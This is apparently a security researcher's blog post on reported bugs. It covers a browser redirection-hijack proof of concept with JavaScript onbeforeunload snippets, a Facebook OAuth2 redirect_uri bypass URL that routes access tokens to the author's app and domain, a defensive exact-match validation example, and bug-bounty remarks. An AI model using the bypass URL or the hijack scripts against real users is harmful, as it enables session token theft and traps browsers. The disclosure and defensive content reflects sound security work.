To keep a record of the little things I have done since my last blog post:
1- IE/Firefox – Page Redirection Hijack
Several weeks ago, I reported an interesting PoC via my Twitter in which I had created a web page that prevents Firefox and IE from redirecting users to their intended destination, even if they had typed it directly in the address bar: https://twitter.com/irsdl/status/294239415428067329
This issue is still unpatched in the latest versions of these browsers (March 2013). Unfortunately, some advert companies are currently exploiting this issue as well. I have already reported it to Mozilla: https://bugzilla.mozilla.org/show_bug.cgi?id=839470
Example 1: No Redirection Ever: http://0me.me/demo/mozilla/firefox/UnRedirectablePage.html
Here is the Javascript code that does this:
window.onbeforeunload = function(){
    // Unredirectable Page
    setTimeout("window.location=document.location;alert('delay by alert');", 0);
}
Example 2: This always redirects you to secproject.com: http://0me.me/demo/mozilla/firefox/RedirectToSecProject.html
Here is the Javascript code that does this:
window.onbeforeunload = function(){
    // Unredirectable Page
    setTimeout("window.location='http://www.secproject.com';alert('delay by alert');", 0);
}
2- Facebook OAuth2 Bypass
Facebook OAuth2, yet another redirection bypass! I only found one issue, which was very similar to what Nir Goldshlager (www.nirgoldshlager.com) and Egor Homakov (homakov.blogspot.co.uk) had reported to Facebook. I highly recommend their blog posts about Facebook OAuth2 for reading and learning!
Here is what I have found in Facebook:
The following URL could send your session to the attacker's domain, where he could hijack your OAuth token:
https://www.facebook.com/dialog/oauth?client_id=210831918949520&response_type=token&scope=,,,,&redirect_uri=https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523
It used to work in all browsers. However, you needed to find an authorised Facebook app in order to be able to exploit this issue.
A short description:
– “/////” in the URL -> to bypass IE problem with Facebook redirection
– “candycrush1” -> to redirect the user to a normal user page instead of candycrush game! “https://apps.facebook.com/candy.crush1” takes you to a user page instead of an App!
– “%2523” and “%23” -> to remove # in the final URL and send the token directly in the URL.
The result of loading that URL was:
http://apps.facebook.com/testrdirsdl/&access_token=BlahBlahBlah&expires_in=5033
in which “testrdirsdl” is my app that can store the tokens in “http://www.secproject.com/demo/showmyinfo.php” (it does not have logging functionality at the moment!)
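The three tricks above (multiple slashes, a look-alike app path and double-encoded "#") all rely on the authorization endpoint accepting a redirect_uri that merely resembles a registered one. The usual mitigation is exact-match validation of redirect_uri against the URIs registered for the client_id, with the token only ever appended after that check passes. The following is an added example written for this post, not Facebook's code; the registered URI list and the buildTokenRedirect helper are constructed for illustration, and only the client_id, the bypass URL and the token/expires values are taken from the post.

```javascript
// Added example (not Facebook's code): exact-match redirect_uri validation
// for an OAuth2 implicit-grant authorization endpoint.
// Constructed registry: client_id from the post, registered URI is assumed.
const REGISTERED_REDIRECT_URIS = {
  "210831918949520": ["https://apps.facebook.com/candycrush/"],
};

// Returns true only when redirectUri is exactly one of the URIs registered
// for clientId. No prefix matching, no pattern matching, no normalisation
// of the caller's string before comparison.
function isAllowedRedirectUri(clientId, redirectUri) {
  const allowed = REGISTERED_REDIRECT_URIS[clientId];
  if (!allowed) return false;

  let parsed;
  try {
    parsed = new URL(redirectUri);
  } catch (e) {
    return false; // not a parseable absolute URL
  }

  // Defence in depth before the exact match:
  if (parsed.protocol !== "https:") return false;  // tokens only over TLS
  if (parsed.hash !== "") return false;            // redirect_uri must carry no fragment
  if (/%2[35]/i.test(redirectUri)) return false;   // encoded '#' / '%' (the %23 / %2523 trick)
  if (/\/{2,}/.test(parsed.pathname)) return false; // repeated slashes in the path (the ///// trick)

  return allowed.includes(redirectUri);            // exact string match
}

// Builds the final redirect for response_type=token, or returns null when
// the redirect_uri is not acceptable (the server should then show an error
// page and must not redirect at all).
function buildTokenRedirect(clientId, redirectUri, accessToken, expiresIn) {
  if (!isAllowedRedirectUri(clientId, redirectUri)) return null;
  const params = new URLSearchParams({
    access_token: accessToken,
    expires_in: String(expiresIn),
  });
  // Token goes in the fragment, so it never reaches a server log via the path.
  return redirectUri + "#" + params.toString();
}

// Constructed usage: the bypass URL from the post is rejected, the
// registered URI is accepted.
const BYPASS_URI =
  "https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523";
console.log(buildTokenRedirect("210831918949520", BYPASS_URI, "BlahBlahBlah", 5033));
console.log(buildTokenRedirect("210831918949520",
  "https://apps.facebook.com/candycrush/", "BlahBlahBlah", 5033));
```

Note that the exact-match line alone already rejects the bypass URL; the earlier checks are there so that a later, more lenient registry (for example one allowing several paths per client) still refuses encoded separators and repeated slashes.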
3- BugCrowd!
I took part in several BugCrowd.com bounties and gladly received $$$ for private and public bounties! I liked the charity ones as well :-)
If you want to test live and different websites without legal obligations (well, I hope they can provide us with a signed document per project very soon!), it is the right place. I recommend it to people who want to have fun and improve their web application security testing skills.
Unfortunately, the recent bounties from BugCrowd did not have fair prizes, and I guess it is because of the companies' budgets. Moreover, we still need them to come up with the hall of fame table! As soon as they sort these out, I will become more interested!
That’s it for now. Thanks for your time.